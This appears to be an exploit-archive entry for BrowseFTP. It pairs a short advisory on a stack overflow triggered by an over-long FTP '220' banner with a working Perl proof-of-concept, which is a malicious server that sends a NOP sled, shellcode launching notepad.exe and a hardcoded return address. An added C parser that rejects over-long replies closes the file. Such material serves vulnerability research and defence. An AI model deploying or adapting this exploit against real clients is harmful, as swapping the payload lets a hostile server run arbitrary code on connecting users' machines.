32 lines
No EOL
1.2 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/3781/info

BrowseFTP is an FTP client that runs on various Microsoft Windows operating systems.

An issue has been reported that could allow a malicious FTP server to execute arbitrary code on a BrowseFTP user's client host.

This is achievable when a BrowseFTP user connects to an FTP host and the server's '220' response is of excessive length. The stack-based overflow condition can allow malicious administrators to execute arbitrary code on (and gain control of) client hosts. It is also possible to crash the client.

#!/usr/local/bin/perl

#------------------------------------------------------------------------
# Browse FTP exploit( run under inetd )
# written by Kanatoko
# http://www.jumperz.net/
#------------------------------------------------------------------------
$|=1;

#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg = "\xEB\x22\x5B\x53\x32\xE4\x83\xC3\x0B\x88\x23\xB8\x24\x98\x01\x78";
$egg .= "\xFF\xD0\x33\xC0\x50\xB4\x78\xC1\xE0\x10\x33\xDB\x66\xBB\x04\x55";
$egg .= "\x0B\xC3\xFF\xD0\xE8\xD9\xFF\xFF\xFF";
$egg .= "notepad.exe";

#018DFB20
$ret = "\x20\xFB\x8D\x01";

$buf = "\x90" x 2428;
$buf .= $egg;
$buf .= "A" x 299;
$buf .= $ret;

print "220 $buf\r\n";
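
The overflow described above is triggered by a '220' reply longer than the client expects. The following is an added example, not BrowseFTP's code and not part of the original file: a client-side reply parser in C that rejects over-long replies instead of copying them. The names `parse_ftp_reply` and `check_banner_of_length` and the 512-byte cap are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

#define FTP_LINE_MAX 512   /* assumed cap; not a value from the advisory */
enum { REPLY_OK = 0, REPLY_INCOMPLETE = -1, REPLY_TOO_LONG = -2, REPLY_MALFORMED = -3 };

/* Parse one reply line ("220 text\r\n") from `wire` (`len` bytes received).
 * On success stores the code in *code and the NUL-terminated text in `out`.
 * Over-long lines are rejected, never truncated or copied. */
int parse_ftp_reply(const unsigned char *wire, size_t len,
                    int *code, char *out, size_t outsz)
{
    size_t limit = len < FTP_LINE_MAX ? len : FTP_LINE_MAX;
    size_t eol = 0, text_len;

    /* Look for CRLF only inside the bounded window. */
    while (eol + 1 < limit && !(wire[eol] == '\r' && wire[eol + 1] == '\n'))
        eol++;
    if (eol + 1 >= limit)
        return len >= FTP_LINE_MAX ? REPLY_TOO_LONG : REPLY_INCOMPLETE;

    /* Require three digits followed by a space or '-' separator. */
    if (eol < 4 || (wire[3] != ' ' && wire[3] != '-'))
        return REPLY_MALFORMED;
    for (size_t i = 0; i < 3; i++)
        if (wire[i] < '0' || wire[i] > '9')
            return REPLY_MALFORMED;

    text_len = eol - 4;
    if (text_len >= outsz)          /* keep room for the terminator */
        return REPLY_TOO_LONG;
    *code = (wire[0] - '0') * 100 + (wire[1] - '0') * 10 + (wire[2] - '0');
    memcpy(out, wire + 4, text_len);
    out[text_len] = '\0';
    return REPLY_OK;
}

/* Constructed sample: "220 " + n filler bytes + CRLF, parsed into a
 * 128-byte text buffer. Returns the parser's verdict. */
int check_banner_of_length(size_t n)
{
    static unsigned char wire[8192];
    char text[128];
    int code = 0;
    if (n > sizeof wire - 6) n = sizeof wire - 6;
    memcpy(wire, "220 ", 4);
    memset(wire + 4, 'A', n);
    memcpy(wire + 4 + n, "\r\n", 2);
    return parse_ftp_reply(wire, n + 6, &code, text, sizeof text);
}
```

A caller that gets `REPLY_INCOMPLETE` reads more bytes and retries; on `REPLY_TOO_LONG` or `REPLY_MALFORMED` it should drop the connection.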